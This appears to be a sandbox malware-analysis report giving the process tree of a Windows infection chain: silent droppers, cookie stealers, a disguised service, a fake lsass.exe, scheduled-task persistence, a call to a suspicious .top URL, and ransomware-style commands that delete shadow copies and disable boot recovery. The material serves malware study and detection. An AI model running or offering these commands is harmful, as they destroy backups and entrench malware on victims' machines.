C:\Users\Admin\AppData\Local\Temp\4d-2dad8-e63-e928c-e3c4738fd3994\SHolilivaesae.exe"C:\Users\Admin\AppData\Local\Temp\4d-2dad8-e63-e928c-e3c4738fd3994\SHolilivaesae.exe"5⤵PID:4444
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kayq0zvf.inl\GcleanerEU.exe /eufive & exit6⤵PID:8500
-
C:\Users\Admin\AppData\Local\Temp\kayq0zvf.inl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kayq0zvf.inl\GcleanerEU.exe /eufive7⤵PID:5060
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kayq0zvf.inl\GcleanerEU.exe" & exit8⤵PID:696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f9⤵
- Kills process with taskkill
PID:4428
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z0g0xmjc.czs\installer.exe /qn CAMPAIGN="654" & exit6⤵PID:6384
-
C:\Users\Admin\AppData\Local\Temp\z0g0xmjc.czs\installer.exeC:\Users\Admin\AppData\Local\Temp\z0g0xmjc.czs\installer.exe /qn CAMPAIGN="654"7⤵PID:7248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbeseaad.yuy\anyname.exe & exit6⤵PID:7668
-
C:\Users\Admin\AppData\Local\Temp\fbeseaad.yuy\anyname.exeC:\Users\Admin\AppData\Local\Temp\fbeseaad.yuy\anyname.exe7⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\fbeseaad.yuy\anyname.exe"C:\Users\Admin\AppData\Local\Temp\fbeseaad.yuy\anyname.exe" -q8⤵PID:9276
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yazfmosv.h0q\gcleaner.exe /mixfive & exit6⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\yazfmosv.h0q\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yazfmosv.h0q\gcleaner.exe /mixfive7⤵PID:9328
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yazfmosv.h0q\gcleaner.exe" & exit8⤵PID:1752
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f9⤵
- Kills process with taskkill
PID:7408
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lqggzo4s.4y4\autosubplayer.exe /S & exit6⤵PID:8392
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 1601⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe" -q1⤵
- Executes dropped EXE
PID:5112
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2384 -
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Process spawned unexpected child process
PID:3352
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"2⤵
- Executes dropped EXE
PID:4436 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:10932
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:10464
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Process spawned unexpected child process
PID:4284 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global3⤵PID:6380
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Process spawned unexpected child process
PID:7456 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global3⤵PID:9720
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Process spawned unexpected child process
PID:5944 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global3⤵PID:7032
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-32OI1.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-32OI1.tmp\VPN.tmp" /SL5="$10374,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent1⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\is-DCUD1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-DCUD1.tmp\Setup.exe" /silent /subid=7202⤵PID:8052
-
C:\Users\Admin\AppData\Local\Temp\is-HBIG6.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-HBIG6.tmp\Setup.tmp" /SL5="$302E2,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-DCUD1.tmp\Setup.exe" /silent /subid=7203⤵PID:7792
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵PID:7436
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵PID:8356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵PID:5608
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵PID:9636
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵PID:8636
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵PID:9704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-QVONV.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-QVONV.tmp\WEATHER Manager.tmp" /SL5="$2030A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent1⤵PID:4924
-
C:\Users\Admin\AppData\Local\Temp\is-9CDC1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9CDC1.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7152⤵PID:8104
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-9CDC1.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-9CDC1.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579441 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"3⤵PID:10092
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-7NEJ0.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-7NEJ0.tmp\Inlog.tmp" /SL5="$30202,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵PID:5272
-
C:\Users\Admin\AppData\Local\Temp\is-65QJ5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-65QJ5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵PID:7880
-
C:\Users\Admin\AppData\Local\Temp\is-D2I9A.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D2I9A.tmp\Setup.tmp" /SL5="$C006C,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-65QJ5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵PID:8056
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-80KDR.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵PID:1216
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-80KDR.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵PID:5668
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵PID:672
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵PID:8580
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵PID:7976
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\is-80KDR.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-80KDR.tmp\{app}\vdi_compiler"4⤵PID:9656
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-80KDR.tmp\{app}\vdi_compiler.exe"5⤵PID:5860
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 46⤵
- Runs ping.exe
PID:8768
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:4368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵PID:5336
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt1⤵PID:916
-
C:\ProgramData\mgknq\kbvnesg.exeC:\ProgramData\mgknq\kbvnesg.exe start1⤵PID:5520
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5672
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 10AF220A221714CE4598E14C625320B8 C2⤵PID:4108
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5F4B8660B096DA401F40BF3C662E8C982⤵PID:8664
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 98FAB19A3B47155C8C74D4A599472C9C C2⤵PID:9648
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2B428AFD6B4D89423596A9DA960B51CB C2⤵PID:9768
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵PID:6964
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵PID:9244
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵PID:6788
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7fff41a3dec0,0x7fff41a3ded0,0x7fff41a3dee05⤵PID:4384
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=1876 /prefetch:85⤵PID:9040
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=1864 /prefetch:85⤵PID:392
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1816 /prefetch:25⤵PID:2508
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2528 /prefetch:15⤵PID:4948
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:15⤵PID:7032
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=3088 /prefetch:85⤵PID:5784
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3004 /prefetch:25⤵PID:10368
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=3620 /prefetch:85⤵PID:11096
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=3292 /prefetch:85⤵PID:11092
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=3600 /prefetch:85⤵PID:8028
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1800,5749529033089970458,15445635120373395989,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6788_1084257183" --mojo-platform-channel-handle=3476 /prefetch:85⤵PID:5212
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_6DBC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"3⤵PID:10148
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8896
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5336
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9780
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10180
-
C:\Users\Admin\AppData\Local\Temp\1683.exeC:\Users\Admin\AppData\Local\Temp\1683.exe1⤵PID:9808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bulvhbgv\2⤵PID:9680
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\obbzyzmm.exe" C:\Windows\SysWOW64\bulvhbgv\2⤵PID:9524
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create bulvhbgv binPath= "C:\Windows\SysWOW64\bulvhbgv\obbzyzmm.exe /d\"C:\Users\Admin\AppData\Local\Temp\1683.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:9268
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description bulvhbgv "wifi internet conection"2⤵PID:2612
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start bulvhbgv2⤵PID:9064
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:7184
-
-
C:\Users\Admin\AppData\Local\Temp\1C70.exeC:\Users\Admin\AppData\Local\Temp\1C70.exe1⤵PID:9968
-
C:\Users\Admin\AppData\Local\Temp\2625.exeC:\Users\Admin\AppData\Local\Temp\2625.exe1⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\3FA9.exeC:\Users\Admin\AppData\Local\Temp\3FA9.exe1⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\443E.exeC:\Users\Admin\AppData\Local\Temp\443E.exe1⤵PID:7772
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -start2⤵PID:3456
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\lsass.exe" -agent 03⤵PID:8540
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:8632
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:5440
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:10320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:9296
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:9812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:6288
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:4464
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:9708
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:5620
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:9084
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:4636
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵PID:10208
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7664
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0af910e1-5017-574f-9087-530fc4e5c421}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:9140
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"2⤵PID:9352
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:9688
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:8060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\6B01.exeC:\Users\Admin\AppData\Local\Temp\6B01.exe1⤵PID:8528
-
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵PID:8636
-
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵PID:9256
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵PID:8548
-
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵PID:6624
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵PID:9744
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
PID:2940
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵PID:9540
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵PID:2940
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
PID:4140
-
-
